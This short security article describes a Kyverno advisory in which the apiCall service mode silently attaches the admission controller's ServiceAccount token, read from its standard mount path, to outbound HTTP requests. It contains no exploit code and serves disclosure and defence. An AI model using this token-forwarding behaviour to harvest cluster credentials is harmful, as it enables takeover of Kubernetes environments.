Kyverno Kubernetes Security Flaw: High-Risk ServiceAccount Token Leak in apiCall Service Mode

A critical security vulnerability in Kyverno, a popular Kubernetes policy engine, automatically exposes the cluster's internal ServiceAccount credentials to external endpoints. The flaw, designated GHSA-8wfp-579w-6r25, is rated high severity and stems from an insecure-by-default design in the `apiCall` service mode. This undocumented behavior allows the admission controller's powerful ServiceAccount token to be silently attached to every outbound HTTP request, creating a direct path for credential exfiltration to attacker-controlled servers without any explicit action from a policy author.

The vulnerability resides in the `pkg/engine/apicall/executor.go` file. The code automatically reads the sensitive token from the standard Kubernetes mount path `/var/run/secrets/kubernetes.io/serviceaccount/token`. If an outgoing HTTP request lacks an explicit `Authorization` header, the system injects the token using `Authorization: Bearer <token>`. This creates a scenario of implicit credential forwarding, where any policy making an external API call could inadvertently leak the cluster's administrative credentials.

This design flaw presents a severe risk to any Kubernetes cluster using Kyverno's apiCall feature. The exposed ServiceAccount token typically possesses broad permissions within the cluster, potentially granting an attacker the same level of access as the admission controller itself. The lack of documentation and the automatic, opt-out nature of the token injection means administrators may be unaware their policies are leaking credentials until a breach occurs, placing entire containerized environments under immediate threat.